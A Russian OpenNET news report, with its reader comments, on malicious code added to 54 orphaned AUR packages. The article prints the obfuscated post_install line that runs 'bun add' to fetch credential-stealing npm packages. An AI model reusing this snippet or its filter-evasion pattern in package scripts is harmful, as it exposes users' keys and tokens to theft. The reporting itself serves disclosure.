Профиль: Аноним (вход | регистрация) неRU opennet.me  
The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета

14.06.2026 14:41 (MSK)

Несмотря на меры, предпринятые разработчиками Arch Linux, деятельность по подстановке вредоносного кода в репозитории AUR (Arch User Repository) не остановлена. Несколько часов назад вредносный код подставлен ещё в 54 пакета, оставшихся без сопровождающих (история отмены вредоносных правок). В отличие от позавчерашних атак, вместо пакетного менеджера npm для установки вредоносных зависимостей на этот раз задействована платформа bun. Для обхода реализованных фильтров в функцию post_install вставляется обфусцированная строка, в которой вызывается команда "bun add" для установки пакетов с вредоносным кодом, осуществляющим сканирование и отправку на внешний сервер ключей, токенов и учётных данных.


   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }

Тем временем зафиксирована ещё одна атака на AUR, на этот раз вместо подстановки вредоносного ПО в несколько десятков пакетов, оставшихся без сопровождающего, был добавлен вывод нецензурного сообщения на русском языке с оскорблением пользователей и предложением поменять дистрибутив или перестать использовать AUR.

  1. Главная ссылка к новости (https://lists.archlinux.org/ar...)
  2. OpenNews: Атакующие скомпрометировали 1577 пакетов в репозитории AUR
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/65685-aur
Ключевые слова: aur, arch, malware, bun
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (139) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, ы (?), 14:52, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +13 +/
    > AUR
    > @
    > looks inside
    > @
    > npm

    well...

     
     
  • 2.148, Сладкая булочка (?), 20:41, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    какие пользователи, такой и дистр
     

  • 1.2, Аноним (2), 15:01, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –19 +/
    А зачем вообще аур сегодня? Актуально было 20 лет назад, потому что rpm собирать было ещё той канителью и тут простой сборочный скрипт. Но аур всегда был помойкой.
     
     
  • 2.33, Комиссар (?), 18:05, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Ну так АУР это не всегда перепаковка deb/rpm. Иногда это еще сборка из сырцов или перефасовка appimage. И как следствие — своевременные обновления без многогигабайтных зависимостей.
     
  • 2.39, Аноним (39), 18:13, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Все еще. Особенно ядро патченное
     
     
  • 3.117, Аноним (117), 14:16, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем вам свалка неподдерживаемых пакетов? Даже если вы не хотите изучать nix и guix, то засуньте пакет в официальный репозиторий.
     
     
  • 4.150, Аноним (150), 00:57, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Зачем вам свалка неподдерживаемых пакетов? Даже если вы не хотите изучать nix
    > и guix, то засуньте пакет в официальный репозиторий.

    Если бы ещё пакеты, там свалка полуфабрикатов.

     
  • 4.151, Аноним (150), 00:58, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Зачем вам свалка неподдерживаемых пакетов? Даже если вы не хотите изучать nix
    > и guix, то засуньте пакет в официальный репозиторий.

    Чтоб засунуть что угодно в официальный репозиторий, нужно ещё проверку полиси пройти, а в AUR можно сразу из под коня лопатой забрасывать и никто ничего не спросит. ;)

     
  • 2.184, Аноним (184), 13:22, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > yay llama.cpp-hip

    И у меня собранное и оптимизированное под мое конкретное железо ПО.

     

  • 1.3, Аноним (3), 15:03, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    может проблема не в aur, а в npm например?
     
     
  • 2.9, Аноним (9), 15:51, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +12 +/
    Крутая логика. Дом вскрыли монтировкой, потому что там не было замка, камер и систем защиты. Вывод - виноваты монтировки.
     
     
  • 3.83, Аноним (83), 22:39, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Нет, логика неверна

    Правильнее:

    Разбили окно (aur) в квартире, просунули трубу (npm) и стали заливать говном.
    Вывод - виноват тот, кто разбил окно, засунул трубу и пустил по ней говно (тайпскриптеров)

     
     
  • 4.142, Аноним (142), 16:47, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Нет, логика неверна
    > Разбили окно (aur) в квартире, просунули трубу (npm) и стали заливать говном.
    > Вывод - виноват тот, кто разбил окно, засунул трубу [...]

    Нет, по логике того персонажа виновата труба.

    А окно никто не разбивал, лол. Его вообще не было. Как и стен с дверьми.

     
  • 2.22, Аноним (22), 16:50, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > может проблема не в aur, а в npm например?

    Тем временем в новости:

    > в этот раз задействована платформа bun

    Да, проблема в npm. 🤦

     
     
  • 3.109, www (??), 08:00, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Напомни, а с какого ресурса bun пакеты черпает?
     
     
  • 4.141, Аноним (142), 16:44, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Напомни, а с какого ресурса bun пакеты черпает?

    По умолчанию - с реестра npm, но можно и любой другой задать. А что?

    Ты лучше объясни, по какой логике в этой ситуации виноват npm, а не aur. А то тот персонаж уже нам не ответит.

    Ведь можно было и не возится с npm/bun, а просто через wget/curl подтянуть любой исполняемый файл (в т.ч. скрипт на любом языке). Но виноват npm, да.

     
  • 3.110, анм (?), 08:28, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Да, проблема в npm

    Так именно, все одно, jsts свалка

     

  • 1.5, Аноним (5), 15:15, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –5 +/
    А что, flatpack не помог?
     
     
  • 2.23, Аноним (22), 16:52, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Помог. Ведь ломают AUR, а не Flatpack. Ты даже заголовок не осилил. 🤦
     
     
  • 3.68, Аноним (68), 20:28, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ломают не AUR, а orphaned пакеты. Там может любой подхватить и мейнтейнить "старый, никому не нужный пакет" (ключевые слова). А с AUR все в порядке, это просто инфраструктура :) Осилятор ты наш.
     
     
  • 4.73, Аноним (22), 21:01, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Там может любой подхватить и мейнтейнить "старый, никому не нужный пакет"

    И из этого ты делаешь вывод, что:

    > с AUR все в порядке

    Я все правильно понял?

     
  • 4.91, Смузихеб забывший пароль (?), 01:31, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    т.е установка дырявых пакетов это не проблема, а норма для аур и арча ?
     
     
  • 5.158, Мимопроходил (?), 09:55, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > т.е установка дырявых пакетов это не проблема, а норма для аур и
    > арча ?

    Установка из AUR-помойки пакетбилдов, которые хз что билдят на целевой системе, да, это норма для арчеводства.
    За всю свою жизнь встречал на просторах сети лично только одного арчевода, который юзал принципиально только официальные репы, а AUR не трогал. В связи с чем я делаю вывод, что как раз он-то был и ненастоящий арчевод. ))

     
  • 4.156, ЛщЛ (?), 09:46, 16/06/2026 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 5.157, ЛщЛ (?), 09:49, 16/06/2026 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 2.34, Комиссар (?), 18:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А думаешь кто-то проверяет что он там устанавливает?
     
     
  • 3.159, Мимопроходил (?), 09:59, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > А думаешь кто-то проверяет что он там устанавливает?

    Если верить местным опеннетовским арчеводам, то конечно же, в каждый рецепт пакетбилда обязательно заглядывают и по ссылкам до гитхабов ходят, глазками проверяют, а настоящий ли там апстрим или самозванец.

    А так, и аудит кода у апсрмима почти каждый десятый делает, если верить тому, что в сети говорят.
    В общем, волноваться не о чем.

     

  • 1.8, Аноним (8), 15:51, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Почему заброшенные пакеты не удаляют, а передают любому желающему? Предупреждение, стандартные 30 дней не размышление, нет ответа - удаление.
     
     
  • 2.10, Аноним (2), 15:55, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    У тебя так сопровождающих не останется. А ответ это power tripping, результат никого не волнует.
     
  • 2.18, Аноним (18), 16:29, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > 30 дней не размышление

    даже в отпуск не съездить

     
     
  • 3.70, Аноним (70), 20:34, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    возьми с собой ноутбук
     
     
  • 4.116, Я (??), 13:20, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    ты думаешь, интернет везде есть?
     
     
  • 5.139, Аноним (139), 15:58, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >ты думаешь, интернет везде есть?

    Со старлинком - везде.

     
  • 4.161, Мимопроходил (?), 10:05, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > возьми с собой ноутбук

    А если у мейнтенера активный отдых, детокс и по горам лазит, где каждый лишний грамм втягость, а потом в тибетских горных монастырях медитирует наконец-то вдали от цивилизации?

     
  • 3.154, аноним12345 (?), 07:27, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Расскажи это жителям США, где отпуск в 4-7 дней в году радость радостная.
     
     
  • 4.182, Аноним (182), 12:14, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    вы про госдолг забыли упомянуть
     
  • 3.162, ЛщЛ (?), 10:06, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >> 30 дней не размышление
    > даже в отпуск не съездить

    Арчевод не может на столь долгий срок свой Арчик оставить без обновлений, вы чего крамолу какую-то распространяете?!

     
  • 2.27, небесный ученый (?), 17:15, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +6 +/
    > Почему заброшенные пакеты не удаляют

    удаляются, раз в два года
    https://wiki.archlinux.org/title/AUR_Cleanup_Day

    > а передают любому желающему?

    а почему бы и нет ?
    любой желающий может прислать пакет(точнее рецепт сборки пакета);
    любой желающий может поддерживать пакет;
    любой желающий может поднять брошенное знамя;
    минимум ограничений.
    Да риски всегда есть, отсутствие надзирателя подразумевает самодисциплину.
    Ограбить тебя могут даже в самом свободном городе в темной подворотне, но и в тюрьме где будешь под полным контролем ты не застрахован от неприятностей.


     
  • 2.128, Аноним (128), 15:03, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Почему заброшенные пакеты не удаляют, а передают любому желающему? Предупреждение, стандартные 30 дней не размышление, нет ответа - удаление.

    Потому что это не пакеты, а рецепты сборки пакетов. Какой смысл удалять рецепты? Чтобы создать неприятности их пользователям на ровном месте? Из неуважения к чужому труду? Наоборот, брошенные (Trusted User-ами) пакеты из репо перемещают в AUR, чтобы те, кому они всё ещё нужны, могли собрать их (и сопровождать) самостоятельно. Причем, они всё ещё могут оставаться закреплены за прежним TU, как раз, для предотвращения захвата злоумышленниками.
    И только если в AUR они находятся длительное время сиротами без сопровождения, тогда их могут удалить окончательно (но они всё ещё могут сохраниться в архивах).


     
  • 2.155, 1 (??), 09:32, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    leftpad ничему не научил ?
     
  • 2.160, ЛщЛ (?), 10:02, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Почему заброшенные пакеты не удаляют, а передают любому желающему? Предупреждение, стандартные
    > 30 дней не размышление, нет ответа - удаление.

    Ну конечно, вот такая стратегия точно  все проблемы решит!

    https://www.opennet.me/openforum/vsluhforumID3/140454.html#156

    Банки с сомнительным содержимым просто не будут долго стоять на поддонах, а всего 30 дней.

     

  • 1.11, Аноним (11), 15:56, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Зачем они это делают? На данных пользователей арча можно как-то поживиться?
     
     
  • 2.26, iPony128052 (?), 17:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да.
    Тот же криптокошелёк украсть или просто плюс один к ботнету.
     
     
  • 3.31, небесный ученый (?), 18:01, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    мало вериться, в большинстве случаев пакеты рецепты заброшены не просто так Ес... большой текст свёрнут, показать
     
     
  • 4.65, Аноним (65), 20:17, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Возможно расчет на людей, которые какое-то непопулярное овно поставили и забыли про него. А тут бах и обновка прилетела через какой-нибудь yay/paru. Ну их, честно говоря, и не жалко, если ты не смотришь diff'ы при обновлении софта из AUR, ну кто же тебе виноват?..
     
  • 4.95, iPony128052 (?), 04:03, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Так вот из той "сотни", если их конечно наберется столько, криптокошелёк будет хорошо если у пары человек да и то не факт

    Да. Но какая разница, если попытка не пытка.
    Я бы понял, если бы ради такой цели надо было год трудится.
    А тут раз и готово.

     
  • 4.96, iPony128052 (?), 04:08, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Тем более всё же написано.

    > Вредоносное ПО осуществляло сканирование и отправку на внешний сервер ключей и учётных данных VPN, Docker, Podman и SSH, а также извлечённых из браузера конфиденциальных данных, истории команд в shell, ключей криптовалютных кошельков, токенов доступа к Slack, Microsoft Teams, Discord, GitHub, NPM и Vault

    Вот этим чего бы стырить. А вдруг повезёт.

    > Зафиксирована ещё одна атака на AUR, на этот раз вместо подстановки вредоносного ПО в несколько десятков пакетов, оставшихся без сопровождающего, был добавлен вывод нецензурного сообщения на русском языке с оскорблением пользователей и предложением поменять дистрибутив или перестать использовать AUR.

    Вот этим похулиганить. Может и перед одноклассниками похвастаться. И всё такое.

    Раз можно и это несложно, то и делают.

     
  • 4.163, Анонимский Аноним (?), 10:13, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >[оверквотинг удален]
    > да и забыли удалить, а пакет продолжал висеть мусором. В том
    > же yay(один из наиболее популярный аур-хелперов) при обновлении системы всегда выводиться
    > те пакеты которые брошены, я например смотрю и если не пользуюсь
    > то всегда удаляю, зачем держать лишний мусор в системе.
    > Так вот из той "сотни", если их конечно наберется столько, криптокошелёк будет
    > хорошо если у пары человек да и то не факт. Ботнет
    > тоже так себе идея, риск что его погасят в зародыше довольно
    > велик, все же арч ставить себе решаются далеко не домохозяйки, да
    > и смысл тратить сколько времени и усилий чтобы получить сютню другую
    > узлов, намного проще разводить в этом плане хомяков.

    Поэтому я с AUR переехал на OBS, потому что труба шатал периодически заглядывать в пакетбилды каждый раз. Лучше уж свою хомячью репу содержать, пусть и дублирующую местами чужой труд.
    Зато ты знаешь всегда, что это твои пакеты, а не васянов каких-то пакетбилды.

     

  • 1.12, АДмин (?), 15:59, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Мне вот интересно почему атаки именно на Arch ? Не Void и не NixOS а именно Arch ???  Может это личное ???
     
     
  • 2.13, Аноним (2), 16:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –3 +/
    На серверах популярен, свежий относительно стабильный софт и роллинг. Ну, есть такой миф, что сабж норм. Атака на жсников, и ты правильно можешь предположить, что жсники в него верят в силу низкой квалификации и ограниченного опыта. Впрочем, из альтернатив у тебя только Федора и это корпоративная шляпа с экспериментами, регулярно переустанавливать надо и без гарантий.
     
     
  • 3.16, Аноним (16), 16:21, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    https://get.opensuse.org/ru/tumbleweed/
     
     
  • 4.166, Анонимский Аноним (?), 10:23, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > https://get.opensuse.org/ru/tumbleweed/

    Не знаю почему вас минусанули, но совет действительно дельный. Сам недавно понял, что это таки недурная альтернатива, если нужен именно роллинг-дистр.

    Вот где обделённая вниманием жемчужина.

     
  • 2.25, iPony128052 (?), 17:05, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Чем больше коэффициент популярности помноженный на дырявость - тем логичнее больше атак.

    У арча он явно выше чем у Void и NixOS

     
     
  • 3.36, Комиссар (?), 18:10, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –4 +/
    А при чем тут эти дубовые колымаги? Речь-то о десктопах

    Поставь-ка в эти коряги такие базовые десктоп-штуки как Steam, CoreCtrl и bluetooth — взвоешь.

     
     
  • 4.167, Аноним (150), 10:28, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > А при чем тут эти дубовые колымаги? Речь-то о десктопах
    > Поставь-ка в эти коряги такие базовые десктоп-штуки как Steam, CoreCtrl и bluetooth
    > — взвоешь.

    Ну хз, на Fedora KDE с подключённой копрорепой с ядром CachyOS (копрорепы кстати прям от разрабов каши) и Steam стоит и bluetooth-геймпад работает и CoreCtrl есть. А KDE так вообще порой обновляется раньше, чем в Арчах этих ваших. Никто не взывал и брат жив.

     
  • 3.40, Аноним (40), 18:13, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Чем больше коэффициент популярности

    Тем надежнее бдит 1000гл@3!

     
  • 3.44, небесный ученый (?), 18:23, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    при чем тут дырявость ? AUR "это не баг а фича", как и доброта это не порок. Тем боле везде где тока можно написано что-то типа этого:
    Warning AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.
     
     
  • 4.45, iPony128052 (?), 18:25, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > при чем тут дырявость ? AUR "это не баг а фича"

    Дырявость это не отменяет, если даже об этом написать.

     
  • 4.51, iPony128052 (?), 18:49, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > это не баг а фича

    И такие решения принимают разработчики, а не анонимы.

    Если разработчики начинают менять правила и всё такое, значит ситуация не устраивает.

    А не так что это не баг, а фича.

     
     
  • 5.55, небесный ученый (?), 18:59, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    ты знаешь как расшифровывается AUR ?
     
     
  • 6.58, Аноним (22), 19:21, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    По твоей нелепой логике, маинтайнерам AUR нужно было просто развести руками и сказать "это не дыры - это фича!" - контент-то пользовательский.

    Но они почему-то вместо этого судорожно пытаются исправить ситуацию. Интересно, почему?

     
     
  • 7.72, небесный ученый (?), 20:47, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > По твоей нелепой логике

    о, сразу заход с козырей ? понятно, аргументов у тебя маловато, значит надо добавить грязи.

    > маинтайнерам AUR нужно было просто развести руками и сказать "это не дыры - это фича!" - контент-то пользовательский.

    а что не так ? контент пользовательский, а чей еще ? об этом везде где только можно написано а также о сопутствующих рисках.

    > Но они почему-то вместо этого судорожно пытаются исправить ситуацию. Интересно, почему?

    ну да, исправить, а что делать, закрыть АУР ? тогда это будет глупость, так как это одно из основных преимуществ арча над другими дистрибутивами.
    Какой выход из ситуации ? ну наверное сделать более геморройный массовый захват "мусорных" пакетов, ну и почаще чистить от них, не раз в два года как сейчас а например раз в месяц.

     
     
  • 8.74, Аноним (22), 21:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Аргументов тебе выше уже достаточно привели А чего это надо что-то исправлять, ... текст свёрнут, показать
     
     
  • 9.75, небесный ученый (?), 21:18, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    это не аргументы не исправить, а поправить это большая разница Ты не закрываешь... текст свёрнут, показать
     
     
  • 10.82, Аноним (22), 22:33, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Как скажешь Чувак, иди проспись - ты уже буквально сам с собой споришь ... текст свёрнут, показать
     
     
  • 11.84, небесный ученый (?), 23:01, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    спать и правда пора, но думаю ты меня понял По поводу слова исправлять что испо... текст свёрнут, показать
     
  • 7.121, Аноним (128), 14:35, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > сказать "это не дыры - это фича!" - контент-то пользовательский.
    > Но они почему-то вместо этого судорожно пытаются исправить ситуацию. Интересно, почему?

    Потому что к этому "контенту" есть требования. И кто-то их не соблюдает.

    И это действительно фича. Нигде нельзя так легко опакетить свой (или чужой) софт, как в AUR. Буквально, один раз сгенерировал пару ключей, зарегался на AUR, кинул туда публичный. Всё. Теперь остается только сделать "git push", и ты мейнтейнер.

     
  • 6.63, Аноним (16), 19:57, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >как расшифровывается AUR ?

    Anonymous User Repository

     
  • 6.98, iPony128052 (?), 04:50, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > ты знаешь как расшифровывается AUR ?

    Да. Сути не меняет.

     
  • 5.119, Аноним (128), 14:29, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Если разработчики начинают менять правила и всё такое, значит ситуация не устраивает.

    Конечно. Раньше это не доставляло хлопот, теперь доставляет. Но проблема не в правилах, а в людях, которые их несоблюдают.

     
     
  • 6.152, iPony128052 (?), 03:37, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Конечно. Раньше это не доставляло хлопот,  доставляет. Но проблема не в правилах, а в людях, которые их не соблюдают.

    Вот поэтому правила и меняют. Логично.

     
  • 4.168, Анонимский Аноним (?), 10:34, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > при чем тут дырявость ? AUR "это не баг а фича", как
    > и доброта это не порок. Тем боле везде где тока можно
    > написано что-то типа этого:
    > Warning AUR packages are user-produced content. These PKGBUILDs are completely unofficial
    > and have not been thoroughly vetted. Any use of the provided
    > files is at your own risk.

    AUR по сути свалка и проходной двор. Его многие фичи порождают многие продолбы, он архитектурно такой.

    Да, по идее каждый может залезть в пакетбилд и поворошить палочкой на предмет того, что он на самом деле делает. Но, человеческая ленивая природа такова, что ну один раз ты это сделаешь, ну два, ну когда-нибудь ты всё равно булки расслабишь.

    Ну или же нужно постоянно бдить и периодически тысячеглазить, даже в те пакетбилды, в которые ты уже заглядывал, потому как может случится так, что его хозяин уже поменялся, такие дела.

    Проблема в том, что за лёгкость доступа всяким васянам с улицы ты неизбежно расплачиваешься вот таким вот.

    Тут либо жрать с общей кучи, куда все сваливают непойми что, либо наконец отказаться от неё и уходить в инфраструктуру где паранойи побольше "из коробки".

     
  • 3.165, Анонимский Аноним (?), 10:21, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Чем больше коэффициент популярности помноженный на дырявость - тем логичнее больше атак.
    > У арча он явно выше чем у Void и NixOS

    Потому что в Void и NixOS, особенно в NixOS разбираться надо, это не Arch, тем более что у них инфраструктура не расчитана на уличных мимокрокодилов.

     
  • 2.46, Комиссар (?), 18:27, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Смотри Steam-статистику. Какие дистры там отожрали 50+%?
    Что до Void/NixOS — это тупик: для десктопа они слишком засохшие, а для прода — мало того что не продаются, не имеют оффсапорта, так еще и требуют неадекватной компетенции аникеев.
     
     
  • 3.170, ЛщЛ (?), 10:37, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Смотри Steam-статистику. Какие дистры там отожрали 50+%?
    > Что до Void/NixOS — это тупик: для десктопа они слишком засохшие, а
    > для прода — мало того что не продаются, не имеют оффсапорта,
    > так еще и требуют неадекватной компетенции аникеев.

    Ну да, ну да, Арчик-то оффсапорт имеет, прям энтерпрайз уровень! xD

     
  • 2.80, Анонисссм (?), 22:13, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >Мне вот интересно почему атаки именно на Arch ? Не Void

    потому что в void-е нет aur-оподобной помойки (вроде)

     
     
  • 3.120, Аноним (128), 14:30, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > потому что в void-е нет aur-оподобной помойки (вроде)

    Потому что там в основной репо помойка (но это не точно).

     
  • 3.171, ЛщЛ (?), 10:38, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >>Мне вот интересно почему атаки именно на Arch ? Не Void
    > потому что в void-е нет aur-оподобной помойки (вроде)

    Может быть потому что Void немодный, перед посонами во дворе не похвастаешься, что ты btw-void-овод? ))

     
  • 2.81, funny.falcon (?), 22:27, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    SteamOS основан на Arch. Видимо, хотят зацепить пользователей SteamOS.
     
     
  • 3.93, Аноним (65), 01:44, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Все проще, у какого-то ретарда люто горит с арча. Этот дурачок, раз в месяц то аур ддосить, то овном залить пытается. Практической пользы в компрометации мусорных пакетов 0, на то они и orphaned, что нафиг никому не нужны. Как по мне, цель очевидна, попробовать подмочить репутацию арча/арчеводов. И судя по комментариям местных чукчей страта рабочая.
     
     
  • 4.146, Аноним (146), 18:35, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >Как по мне, цель очевидна, попробовать подмочить репутацию арча/арчеводов.

    Было бы что подмачивать. У арча и арчеводов репутация всегда была так себе. А сам AUR ещё с рождения имел репутацию помойки. И за годы ничего не изменилось, Арч как был так и остался кривым дистром для пионеров, который ломается при каждом объявлении, а aur все та же помойка.

     
     
  • 5.147, Аноним (147), 19:20, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну хз, с одной стороны, твои ауитльные истории, а с другой рач уже шестой год подряд крутящийся на домашнем писюке, без единой переустановки...
     
  • 3.97, iPony128052 (?), 04:10, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще паралельно.

    Большинство пользователей SteamOS внезапно просто запускает игры.

    Им даже предустановленный Flatpak магазин Не упёрся.

    А чтобы они с кучей заклинаний поставили AUR — это вообще фантастика.

     
  • 3.105, Xo (?), 07:20, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Вряд-ли steamos и aur как-то связаны. Aur ещё нужно уметь приготовить на арче.
     
  • 3.172, ЛщЛ (?), 10:40, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > SteamOS основан на Arch. Видимо, хотят зацепить пользователей SteamOS.

    Ну да, с учётом того, что гадят в AUR, а SteamOS делает срез нескольких пакетов Арча, плюс модификации свои вносит уже в своей репе.
    Именно на SteamOS у атакующий AUR-помойку и расчёт, ага!

     
  • 2.164, Анонимский Аноним (?), 10:17, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Мне вот интересно почему атаки именно на Arch ? Не Void и
    > не NixOS а именно Arch ???  Может это личное ???

    Хотите сказать, что в школоарче детятку какого-то обидели сильно, настолько что он решил в песочницу нагадить?

    Возможно. Но думаю, что ответ в том, что именно AUR самая уязвимая площадка, как и традиционная "бдительность" арчеводов относительно хлама, который они волокут к себе в системы. Ну и плюсом что-то личное конечно же может быть. ;)

     

  • 1.17, Аноним (17), 16:25, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    npm config set ignore-scripts true
     
     
  • 2.24, Аноним (22), 16:53, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    И как это тебе поможет?
     
  • 2.41, Комиссар (?), 18:14, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    sudo pamac remove nodejs npm --orphans
     

  • 1.29, Аноним (22), 17:54, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Зафиксирована ещё одна атака на AUR, [...] был добавлен вывод [..] с [...] предложением поменять дистрибутив или перестать использовать AUR.

    Да бессмысленно - эта аудитория необучаема. В прошлой новости адепты Арча пели, что "нужно всего лишь смотреть, что в PKGBUILD файлах 😤".

    Доигрались в крутых хакиров, "контролирующих свою систему". Правда, хакирам никто не сказал, что запускать баш-портянки из публичной помойки - это не совсем по-хакерски. 😳

     
     
  • 2.37, Испанский стыд (?), 18:11, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Написать тебе техническое ревью на твой недопакетный менеджер? Или ты и сам всё понимаешь?
     
     
  • 3.42, Аноним (22), 18:17, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Написать тебе техническое ревью на твой недопакетный менеджер?

    Пиши, конечно!

     
  • 3.57, Аноним (57), 19:01, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Написать тебе техническое ревью на твой недопакетный менеджер?

    Ты лучше напиши, как левые пакетные менеджеры относятся к темы дырявости AUR с его шелл-портянками от васянов.

     
     
  • 4.169, Аноним (147), 10:35, 16/06/2026 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 3.173, Анонимский Аноним (?), 10:42, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Написать тебе техническое ревью на твой недопакетный менеджер? Или ты и сам
    > всё понимаешь?

    Пишите Шура, пишите! А мы почитаем.

     

  • 1.30, Аноним (30), 17:56, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    AUR или не AUR?... Вообще-то любой мейнтейнер может вставить в свой пакет всё что захочет. Просто если код  читают много людей они это заметят, если никто не читает, то не заметят. Но и ещё репутауция.
     
     
  • 2.174, Анонимский Аноним (?), 10:46, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > AUR или не AUR?... Вообще-то любой мейнтейнер может вставить в свой пакет
    > всё что захочет. Просто если код  читают много людей они
    > это заметят, если никто не читает, то не заметят. Но и
    > ещё репутауция.

